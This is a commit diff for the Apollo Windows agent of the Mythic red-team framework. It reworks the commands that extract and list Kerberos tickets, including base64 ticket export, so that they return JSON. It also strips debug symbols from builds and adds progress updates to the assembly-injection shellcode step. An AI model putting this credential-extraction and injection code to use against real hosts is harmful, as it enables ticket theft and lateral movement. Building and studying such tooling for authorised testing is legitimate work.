MythicAgents
diff --git a/‎Payload_Type/apollo/CHANGELOG.MD
+10 b/‎Payload_Type/apollo/CHANGELOG.MD
+10
diff --git a/‎Payload_Type/apollo/Dockerfile
+1-2 b/‎Payload_Type/apollo/Dockerfile
+1-2
diff --git a/‎Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/ITicketManager.cs
+1-1 b/‎Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/ITicketManager.cs
+1-1
diff --git a/‎Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/KerberosTicketInfoDTO.cs
+31-8 b/‎Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/KerberosTicketInfoDTO.cs
+31-8
diff --git a/‎Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/KerberosTicketStoreDTO.cs
+46-29 b/‎Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/KerberosTicketStoreDTO.cs
+46-29
diff --git a/‎Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
+7-7 b/‎Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
+7-7
diff --git a/‎Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosTicketManager.cs
+1-1 b/‎Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosTicketManager.cs
+1-1
diff --git a/‎Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_cache_extract.cs
+9-3 b/‎Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_cache_extract.cs
+9-3
diff --git a/‎Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_cache_list.cs
+6-5 b/‎Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_cache_list.cs
+6-5
diff --git a/‎Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_store_list.cs
+1-8 b/‎Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_store_list.cs
+1-8
diff --git a/‎Payload_Type/apollo/apollo/mythic/agent_functions/assembly_inject.py
+9-16 b/‎Payload_Type/apollo/apollo/mythic/agent_functions/assembly_inject.py
+9-16
diff --git a/‎Payload_Type/apollo/apollo/mythic/agent_functions/builder.py
+3-3 b/‎Payload_Type/apollo/apollo/mythic/agent_functions/builder.py
+3-3
@@ -4,6 +4,16 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [v2.3.6] - 
+
+### Changed
+
+- Added `-p:DebugType=None -p:DebugSymbols=false` to all `dotnet build` commands
+- Removed sRDI package as it wasn't used
+- Standardized donut usage to all be with the donut binary and not partially with the donut PyPi package
+- Updated ticket_[store|cache]_list commands to return structured JSON
+- Added browser scripts for ticket_[store|cache]_list commands
+- 
 ## [v2.3.5] - 2025-03-03
 
 ### Changed
 
@@ -12,9 +12,8 @@ RUN curl -L -o donut_shellcode-2.0.0.tar.gz https://github.com/MEhrn00/donut/rel
 
 WORKDIR /Mythic/
 RUN python3 -m venv /venv
-RUN /venv/bin/python -m pip install mythic-container==0.5.22
+RUN /venv/bin/python -m pip install mythic-container==0.5.22  mslex impacket
 RUN /venv/bin/python -m pip install git+https://github.com/MEhrn00/[email protected]
-RUN /venv/bin/python -m pip install mslex
 
 COPY [".", "."]
 
 
@@ -18,7 +18,7 @@ public interface ITicketManager
     public string GetTargetProcessLuid(int pid);
 
     //should return a ticket with the .kirbi initalized with the ticket data
-    public KerberosTicket ExtractTicketFromCache(string luid, string serviceName);
+    public (KerberosTicket?, string) ExtractTicketFromCache(string luid, string serviceName);
     //should return all tickets in the current LUID or all tickets if running as administrator
     public List<KerberosTicket> EnumerateTicketsInCache(bool getSystemTickets = false, string luid = "");
     //loads a ticket into memory and should be tracked by the agent session
 
@@ -1,31 +1,49 @@
 using System;
+using System.Runtime.Serialization;
 
 namespace ApolloInterop.Features.KerberosTickets;
-
+[DataContract]
 public record KerberosTicketInfoDTO
 {
+    [DataMember(Name = "luid")]
     public string Luid { get; private set; }
+    [DataMember(Name = "current_luid")]
+    public string CurrentLuid {get; set; }
+    [DataMember(Name = "client_name")]
     public string ClientName { get; private set; }
+    [DataMember(Name = "client_realm")]
     public string ClientDomain { get; private set; }
-    
+
     public string ClientFullName => $"{ClientName}@{ClientDomain}";
+    [DataMember(Name = "service_name")]
     public string ServiceName { get; private set; }
+    [DataMember(Name = "service_realm")]
     public string ServiceDomain { get; private set; }
-    
+
     public string ServiceFullName => $"{ServiceName}@{ServiceDomain}";
+    [DataMember(Name = "start_time")]
+    public string StartTimeDisplay { get; private set; }
     public DateTime StartTime { get; private set; }
+    [DataMember(Name = "end_time")]
+    public string EndTimeDisplay { get; private set; }
     public DateTime EndTime { get; private set; }
-    
+
     public string TimeUntilExpiration => (EndTime.ToUniversalTime() - DateTime.UtcNow).ToString(@"dd\.hh\:mm\:ss");
+    [DataMember(Name = "renew_time")]
+    public string RenewTimeDisplay { get; private set; }
     public DateTime RenewTime { get; private set; }
-    
+
     public string TimeUntilRenewal => (RenewTime.ToUniversalTime() - DateTime.UtcNow).ToString(@"dd\.hh\:mm\:ss");
+    [DataMember(Name = "encryption_type")]
+    public string EncryptionTypeDisplay { get; private set; }
     public KerbEncType EncryptionType { get; private set; }
+    [DataMember(Name = "ticket_flags")]
+    public string TicketFlagsDisplay { get; private set; }
     public KerbTicketFlags TicketFlags { get; private set; }
-    
-    
+
+
     private KerberosTicketInfoDTO() { }
-    
+
     public static KerberosTicketInfoDTO CreateFromKerberosTicket(KerberosTicket ticket)
     {
         return new KerberosTicketInfoDTO
@@ -36,10 +54,15 @@ public static KerberosTicketInfoDTO CreateFromKerberosTicket(KerberosTicket tick
             ServiceName = ticket.ServerName,
             ServiceDomain = ticket.ServerRealm,
             StartTime = ticket.StartTime,
+            StartTimeDisplay = ticket.StartTime.ToString(),
             EndTime = ticket.EndTime,
+            EndTimeDisplay = ticket.EndTime.ToString(),
             RenewTime = ticket.RenewTime,
+            RenewTimeDisplay = ticket.RenewTime.ToString(),
             EncryptionType = ticket.EncryptionType,
+            EncryptionTypeDisplay = ticket.EncryptionType.ToString(),
             TicketFlags = ticket.TicketFlags,
+            TicketFlagsDisplay = ticket.TicketFlags.ToString(),
         };
     }
 }
@@ -1,38 +1,55 @@
 using System;
+using System.Runtime.Serialization;
 
 namespace ApolloInterop.Features.KerberosTickets;
 
 //for the moment this is the same as the KerberosTicketDataDTO, but it will be used for the store so more / different fileds may be added that are unique to the store
+[DataContract]
 public record KerberosTicketStoreDTO
 {
-        public string Luid { get; private set; }
-    
-        public string ClientFullName { get; private set; }
-    
-        public string ServiceFullName { get; private set; }
-        public DateTime StartTime { get; private set; }
-        public DateTime EndTime { get; private set; }
-    
-        public string TimeUntilExpiration => (EndTime.ToUniversalTime() - DateTime.UtcNow).ToString(@"dd\.hh\:mm\:ss");
-        public DateTime RenewTime { get; private set; }
-    
-        public string TimeUntilRenewal => (RenewTime.ToUniversalTime() - DateTime.UtcNow).ToString(@"dd\.hh\:mm\:ss");
-        public KerbEncType EncryptionType { get; private set; }
-        public KerbTicketFlags TicketFlags { get; private set; }
-        public string base64Ticket { get; private set; }
-        
-        
-        public KerberosTicketStoreDTO(KerberosTicket ticket)
-        {
-            Luid = ticket.Luid.ToString();
-            ClientFullName = $"{ticket.ClientName}@{ticket.ClientRealm}";
-            ServiceFullName = $"{ticket.ServerName}@{ticket.ServerRealm}";
-            StartTime = ticket.StartTime;
-            EndTime = ticket.EndTime;
-            RenewTime = ticket.RenewTime;
-            EncryptionType = ticket.EncryptionType;
-            TicketFlags = ticket.TicketFlags;
-            base64Ticket = Convert.ToBase64String(ticket.Kirbi);
-        }
+    [DataMember(Name = "luid")]
+    public string Luid { get; private set; }
+    [DataMember(Name = "client_fullname")]
+    public string ClientFullName { get; private set; }
+    [DataMember(Name = "service_fullname")]
+    public string ServiceFullName { get; private set; }
+    [DataMember(Name = "start_time")]
+    public string StartTimeDisplay { get; private set; }
+    public DateTime StartTime;
+    [DataMember(Name = "end_time")]
+    public string EndTimeDisplay { get; private set; }
+    public DateTime EndTime;
+    public string TimeUntilExpiration => (EndTime.ToUniversalTime() - DateTime.UtcNow).ToString(@"dd\.hh\:mm\:ss");
+    [DataMember(Name = "renew_time")]
+    public string RenewTimeDisplay { get; private set; }
+    public DateTime RenewTime;
+    public string TimeUntilRenewal => (RenewTime.ToUniversalTime() - DateTime.UtcNow).ToString(@"dd\.hh\:mm\:ss");
+    public KerbEncType EncryptionType;
+    [DataMember(Name = "encryption_type")]
+    public string EncryptionTypeDisplay { get; private set; }
+    [DataMember(Name = "ticket_flags")]
+    public string TicketFlagsDisplay { get; private set; }
+    public KerbTicketFlags TicketFlags;
+    [DataMember(Name = "ticket")]
+    public string base64Ticket { get; private set; }
+
+
+    public KerberosTicketStoreDTO(KerberosTicket ticket)
+    {
+        Luid = ticket.Luid.ToString();
+        ClientFullName = $"{ticket.ClientName}@{ticket.ClientRealm}";
+        ServiceFullName = $"{ticket.ServerName}@{ticket.ServerRealm}";
+        StartTime = ticket.StartTime;
+        StartTimeDisplay = StartTime.ToString();
+        EndTime = ticket.EndTime;
+        EndTimeDisplay = EndTime.ToString();
+        RenewTime = ticket.RenewTime;
+        RenewTimeDisplay = RenewTime.ToString();
+        EncryptionType = ticket.EncryptionType;
+        EncryptionTypeDisplay = ticket.EncryptionType.ToString();
+        TicketFlags = ticket.TicketFlags;
+        TicketFlagsDisplay = ticket.TicketFlags.ToString();
+        base64Ticket = Convert.ToBase64String(ticket.Kirbi);
+    }
 
 }
@@ -443,14 +443,14 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets
 
 
     //extract ticket
-    internal static KerberosTicket? ExtractTicket(LUID targetLuid, string targetName)
+    internal static (KerberosTicket?, string) ExtractTicket(LUID targetLuid, string targetName)
     {
         try
         {
             targetName = targetName.Trim();
             //needs to be elevated to pass in a logon id so if we aren't we wipe the value here
             //Discarding the logonSessions because we do not need them so we pass false to prevent enumerating them
-            (HANDLE lsaHandle, uint authPackage, IEnumerable<LUID> _) =  InitKerberosConnectionAndSessionInfo(false);
+            (HANDLE lsaHandle, uint authPackage, IEnumerable<LUID> _) =  InitKerberosConnectionAndSessionInfo();
             //if we are not an admin user then we cannot send a real lUID so we need to send a null one
             if(Agent.GetIdentityManager().GetIntegrityLevel() is <= IntegrityLevel.MediumIntegrity)
             {
@@ -462,7 +462,7 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets
             if(ticket is null)
             {
                 DebugHelp.DebugWriteLine($"Failed to find ticket for {targetName}");
-                return null;
+                return (null, $"Failed to find ticket for {targetName}");
             }
 
             KERB_RETRIEVE_TKT_REQUEST request = new()
@@ -497,7 +497,7 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets
             if (status != NTSTATUS.STATUS_SUCCESS || returnStatus != NTSTATUS.STATUS_SUCCESS)
             {
                 DebugHelp.DebugWriteLine($"Failed to extract ticket with error: {status} and return status: {returnStatus}");
-                return null;
+                return (null, $"Failed to extract ticket with error: {status} and return status: {returnStatus}");
             }
             //convert the location of the ticket in memory to a struct
             var response = returnBuffer.CastTo<KERB_RETRIEVE_TKT_RESPONSE>();
@@ -507,17 +507,17 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets
             {
                 DebugHelp.DebugWriteLine("No ticket Data to extract");
                 WindowsAPI.LsaFreeReturnBufferDelegate(returnBuffer);
-                return null;
+                return (null, "No ticket Data to extract");
             }
             //copy the ticket data to a byte array
             ticket.Kirbi = new byte[response.Ticket.EncodedTicketSize];
             Marshal.Copy(response.Ticket.EncodedTicket, ticket.Kirbi, 0, (int)response.Ticket.EncodedTicketSize);
             WindowsAPI.LsaFreeReturnBufferDelegate(returnBuffer);
-            return ticket;
+            return (ticket, "");
         }
         catch (Exception e)
         {
-            return null;
+            return (null, e.Message);
         }
     }
 
 
@@ -35,7 +35,7 @@ public KerberosTicketManager(IAgent agent)
     public string GetTargetProcessLuid(int pid) => KerberosHelpers.GetTargetProcessLuid(pid).ToString();
 
     //ticket cache functions, these effect the session on the system
-    public KerberosTicket? ExtractTicketFromCache(string luid, string serviceName) => KerberosHelpers.ExtractTicket(WinNTTypes.LUID.FromString(luid), serviceName);
+    public (KerberosTicket?, string) ExtractTicketFromCache(string luid, string serviceName) => KerberosHelpers.ExtractTicket(WinNTTypes.LUID.FromString(luid), serviceName);
     public List<KerberosTicket> EnumerateTicketsInCache(bool getSystemTickets = false, string luid = "") => KerberosHelpers.TriageTickets(getSystemTickets,luid).ToList();
 
     public bool LoadTicketIntoCache(byte[] ticket, string luid) => KerberosHelpers.LoadTicket(ticket, WinNTTypes.LUID.FromString(luid));
 
@@ -40,9 +40,15 @@ public override void Start()
         string service = parameters.service;
         try
         {
-            var ticket = _agent.GetTicketManager().ExtractTicketFromCache(luid, service);
-            _agent.GetTicketManager().AddTicketToTicketStore(new(ticket));
-            resp = CreateTaskResponse($"Extracted Ticket for service {service}: \n {KerberosTicketDataDTO.CreateFromKerberosTicket(ticket,luid).ToString().ToIndentedString()}", true);
+            var (ticket, errorMsg) = _agent.GetTicketManager().ExtractTicketFromCache(luid, service);
+            if (ticket != null)
+            {
+                resp = CreateTaskResponse(_jsonSerializer.Serialize(new KerberosTicketStoreDTO(ticket)), true);
+            } else
+            {
+                resp = CreateTaskResponse(errorMsg, true, "error");
+            }
+
         }
         catch (Exception e)
         {
 
@@ -42,14 +42,15 @@ public override void Start()
         try
         {
             var tickets = _agent.GetTicketManager().EnumerateTicketsInCache(getSystemTickets, luid);
-            StringBuilder ticketStringOutput = new StringBuilder();
+            string currentLuid = _agent.GetTicketManager().GetCurrentLuid();
+            List<KerberosTicketInfoDTO> ticketList = new List<KerberosTicketInfoDTO>();
             for(int i = 0; i < tickets.Count; i++)
             {
-                ticketStringOutput.AppendLine($"Ticket # {i}:");
-                ticketStringOutput.Append(KerberosTicketInfoDTO.CreateFromKerberosTicket(tickets[i]).ToString().ToIndentedString());
-                ticketStringOutput.Append("\n");
+                KerberosTicketInfoDTO currentTicket = KerberosTicketInfoDTO.CreateFromKerberosTicket(tickets[i]);
+                currentTicket.CurrentLuid = currentLuid;
+                ticketList.Add(currentTicket);
             }
-            resp = CreateTaskResponse($"Enumerated Tickets \n {ticketStringOutput}", true);
+            resp = CreateTaskResponse(_jsonSerializer.Serialize(ticketList), true);
         }
         catch (Exception e)
         {
 
@@ -27,14 +27,7 @@ public override void Start()
         try
         {
            var storedTickets =   _agent.GetTicketManager().GetTicketsFromTicketStore();
-           StringBuilder ticketStringOutput = new StringBuilder();
-           for(int i = 0; i < storedTickets.Count; i++)
-           {
-               ticketStringOutput.AppendLine($"Store Ticket # {i}:");
-               ticketStringOutput.Append(storedTickets[i].ToString().ToIndentedString());
-               ticketStringOutput.Append("\n");
-           }
-           resp = CreateTaskResponse($"Enumerated Tickets \n {ticketStringOutput}", true);
+            resp = CreateTaskResponse(_jsonSerializer.Serialize(storedTickets), true);
 
         }
         catch (Exception ex)
 
@@ -81,20 +81,6 @@ async def get_files(self, inputMsg: PTRPCDynamicQueryFunctionMessage) -> PTRPCDy
     async def parse_arguments(self):
         if self.command_line[0] == "{":
             self.load_args_from_json_string(self.command_line)
-        else:
-            parts = self.command_line.split(" ", maxsplit=2)
-            if len(parts) < 2:
-                raise Exception("Invalid number of arguments.\n\tUsage: {}".format(AssemblyInjectCommand.help_cmd))
-            pid = parts[0]
-            assembly_name = parts[1]
-            assembly_args = ""
-            assembly_args = ""
-            if len(parts) > 2:
-                assembly_args = parts[2]
-            self.args["pid"].value = pid
-            self.args["assembly_name"].value = assembly_name
-            self.args["assembly_arguments"].value = assembly_args
-
 
 
 class AssemblyInjectCommand(CommandBase):
@@ -112,7 +98,7 @@ async def build_exeasm(self):
         agent_build_path = tempfile.TemporaryDirectory()
         outputPath = "{}/ExecuteAssembly/bin/Release/ExecuteAssembly.exe".format(agent_build_path.name)
         copy_tree(str(self.agent_code_path), agent_build_path.name)
-        shell_cmd = "dotnet build -c release -p:Platform=x64 {}/ExecuteAssembly/ExecuteAssembly.csproj -o {}/ExecuteAssembly/bin/Release/".format(agent_build_path.name, agent_build_path.name)
+        shell_cmd = "dotnet build -c release -p:DebugType=None -p:DebugSymbols=false -p:Platform=x64 {}/ExecuteAssembly/ExecuteAssembly.csproj -o {}/ExecuteAssembly/bin/Release/".format(agent_build_path.name, agent_build_path.name)
         proc = await asyncio.create_subprocess_shell(shell_cmd, stdout=asyncio.subprocess.PIPE,
                                                      stderr=asyncio.subprocess.PIPE, cwd=agent_build_path.name)
         stdout, stderr = await proc.communicate()
@@ -129,8 +115,15 @@ async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreat
         global EXEECUTE_ASSEMBLY_PATH
         taskData.args.add_arg("pipe_name",  str(uuid4()))
         if not path.exists(EXEECUTE_ASSEMBLY_PATH):
+            await SendMythicRPCTaskUpdate(MythicRPCTaskUpdateMessage(
+                TaskID=taskData.Task.ID,
+                UpdateStatus=f"building injection stub"
+            ))
             await self.build_exeasm()
-
+        await SendMythicRPCTaskUpdate(MythicRPCTaskUpdateMessage(
+            TaskID=taskData.Task.ID,
+            UpdateStatus=f"generating stub shellcode"
+        ))
         donutPic = donut.create(file=EXEECUTE_ASSEMBLY_PATH, params=taskData.args.get_arg("pipe_name"))
         file_resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(
             TaskID=taskData.Task.ID,
 
@@ -21,7 +21,7 @@ class Apollo(PayloadType):
     supported_os = [
         SupportedOS.Windows
     ]
-    version = "2.3.5"
+    version = "2.3.6"
     wrapper = False
     wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]
     note = """
@@ -149,7 +149,7 @@ async def build(self) -> BuildResponse:
                                 templateFile = templateFile.replace("HTTP_ADDITIONAL_HEADERS_HERE", "")
                 with open(csFile, "wb") as f:
                     f.write(templateFile.encode())
-            command = f"dotnet build -c release -p:Platform=\"Any CPU\" -o {agent_build_path.name}/Release/"
+            command = f"dotnet build -c release -p:DebugType=None -p:DebugSymbols=false -p:Platform=\"Any CPU\" -o {agent_build_path.name}/Release/"
             #command = "rm -rf packages/*; nuget restore -NoCache -Force; msbuild -p:Configuration=Release -p:Platform=\"Any CPU\""
             await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(
                 PayloadUUID=self.uuid,
@@ -258,7 +258,7 @@ async def build(self) -> BuildResponse:
                                 / "loader.bin"
                             )
                             shutil.move(shellcode_path, working_path)
-                            command = f"dotnet build -c release -p:OutputType=WinExe -p:Platform=\"Any CPU\""
+                            command = f"dotnet build -c release -p:DebugType=None -p:DebugSymbols=false -p:OutputType=WinExe -p:Platform=\"Any CPU\""
                             proc = await asyncio.create_subprocess_shell(
                                 command,
                                 stdout=asyncio.subprocess.PIPE,
Original file line number	Diff line number	Diff line change
`@@ -443,14 +443,14 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets`
`443`	`443`
`444`	`444`
`445`	`445`	`//extract ticket`
`446`		`- internal static KerberosTicket? ExtractTicket(LUID targetLuid, string targetName)`
	`446`	`+ internal static (KerberosTicket?, string) ExtractTicket(LUID targetLuid, string targetName)`
`447`	`447`	`{`
`448`	`448`	`try`
`449`	`449`	`{`
`450`	`450`	`targetName = targetName.Trim();`
`451`	`451`	`//needs to be elevated to pass in a logon id so if we aren't we wipe the value here`
`452`	`452`	`//Discarding the logonSessions because we do not need them so we pass false to prevent enumerating them`
`453`		`- (HANDLE lsaHandle, uint authPackage, IEnumerable<LUID> _) = InitKerberosConnectionAndSessionInfo(false);`
	`453`	`+ (HANDLE lsaHandle, uint authPackage, IEnumerable<LUID> _) = InitKerberosConnectionAndSessionInfo();`
`454`	`454`	`//if we are not an admin user then we cannot send a real lUID so we need to send a null one`
`455`	`455`	`if(Agent.GetIdentityManager().GetIntegrityLevel() is <= IntegrityLevel.MediumIntegrity)`
`456`	`456`	`{`
`@@ -462,7 +462,7 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets`
`462`	`462`	`if(ticket is null)`
`463`	`463`	`{`
`464`	`464`	`DebugHelp.DebugWriteLine($"Failed to find ticket for {targetName}");`
`465`		`- return null;`
	`465`	`+ return (null, $"Failed to find ticket for {targetName}");`
`466`	`466`	`}`
`467`	`467`
`468`	`468`	`KERB_RETRIEVE_TKT_REQUEST request = new()`
`@@ -497,7 +497,7 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets`
`497`	`497`	`if (status != NTSTATUS.STATUS_SUCCESS \|\| returnStatus != NTSTATUS.STATUS_SUCCESS)`
`498`	`498`	`{`
`499`	`499`	`DebugHelp.DebugWriteLine($"Failed to extract ticket with error: {status} and return status: {returnStatus}");`
`500`		`- return null;`
	`500`	`+ return (null, $"Failed to extract ticket with error: {status} and return status: {returnStatus}");`
`501`	`501`	`}`
`502`	`502`	`//convert the location of the ticket in memory to a struct`
`503`	`503`	`var response = returnBuffer.CastTo<KERB_RETRIEVE_TKT_RESPONSE>();`
`@@ -507,17 +507,17 @@ internal static IEnumerable<KerberosTicket> TriageTickets(bool getSystemTickets`
`507`	`507`	`{`
`508`	`508`	`DebugHelp.DebugWriteLine("No ticket Data to extract");`
`509`	`509`	`WindowsAPI.LsaFreeReturnBufferDelegate(returnBuffer);`
`510`		`- return null;`
	`510`	`+ return (null, "No ticket Data to extract");`
`511`	`511`	`}`
`512`	`512`	`//copy the ticket data to a byte array`
`513`	`513`	`ticket.Kirbi = new byte[response.Ticket.EncodedTicketSize];`
`514`	`514`	`Marshal.Copy(response.Ticket.EncodedTicket, ticket.Kirbi, 0, (int)response.Ticket.EncodedTicketSize);`
`515`	`515`	`WindowsAPI.LsaFreeReturnBufferDelegate(returnBuffer);`
`516`		`- return ticket;`
	`516`	`+ return (ticket, "");`
`517`	`517`	`}`
`518`	`518`	`catch (Exception e)`
`519`	`519`	`{`
`520`		`- return null;`
	`520`	`+ return (null, e.Message);`
`521`	`521`	`}`
`522`	`522`	`}`
`523`	`523`
Original file line number	Diff line number	Diff line change
`@@ -40,9 +40,15 @@ public override void Start()`
`40`	`40`	`string service = parameters.service;`
`41`	`41`	`try`
`42`	`42`	`{`
`43`		`- var ticket = _agent.GetTicketManager().ExtractTicketFromCache(luid, service);`
`44`		`- _agent.GetTicketManager().AddTicketToTicketStore(new(ticket));`
`45`		`- resp = CreateTaskResponse($"Extracted Ticket for service {service}: \n {KerberosTicketDataDTO.CreateFromKerberosTicket(ticket,luid).ToString().ToIndentedString()}", true);`
	`43`	`+ var (ticket, errorMsg) = _agent.GetTicketManager().ExtractTicketFromCache(luid, service);`
	`44`	`+ if (ticket != null)`
	`45`	`+ {`
	`46`	`+ resp = CreateTaskResponse(_jsonSerializer.Serialize(new KerberosTicketStoreDTO(ticket)), true);`
	`47`	`+ } else`
	`48`	`+ {`
	`49`	`+ resp = CreateTaskResponse(errorMsg, true, "error");`
	`50`	`+ }`
	`51`	`+`
`46`	`52`	`}`
`47`	`53`	`catch (Exception e)`
`48`	`54`	`{`
Original file line number	Diff line number	Diff line change
`@@ -42,14 +42,15 @@ public override void Start()`
`42`	`42`	`try`
`43`	`43`	`{`
`44`	`44`	`var tickets = _agent.GetTicketManager().EnumerateTicketsInCache(getSystemTickets, luid);`
`45`		`- StringBuilder ticketStringOutput = new StringBuilder();`
	`45`	`+ string currentLuid = _agent.GetTicketManager().GetCurrentLuid();`
	`46`	`+ List<KerberosTicketInfoDTO> ticketList = new List<KerberosTicketInfoDTO>();`
`46`	`47`	`for(int i = 0; i < tickets.Count; i++)`
`47`	`48`	`{`
`48`		`- ticketStringOutput.AppendLine($"Ticket # {i}:");`
`49`		`- ticketStringOutput.Append(KerberosTicketInfoDTO.CreateFromKerberosTicket(tickets[i]).ToString().ToIndentedString());`
`50`		`- ticketStringOutput.Append("\n");`
	`49`	`+ KerberosTicketInfoDTO currentTicket = KerberosTicketInfoDTO.CreateFromKerberosTicket(tickets[i]);`
	`50`	`+ currentTicket.CurrentLuid = currentLuid;`
	`51`	`+ ticketList.Add(currentTicket);`
`51`	`52`	`}`
`52`		`- resp = CreateTaskResponse($"Enumerated Tickets \n {ticketStringOutput}", true);`
	`53`	`+ resp = CreateTaskResponse(_jsonSerializer.Serialize(ticketList), true);`
`53`	`54`	`}`
`54`	`55`	`catch (Exception e)`
`55`	`56`	`{`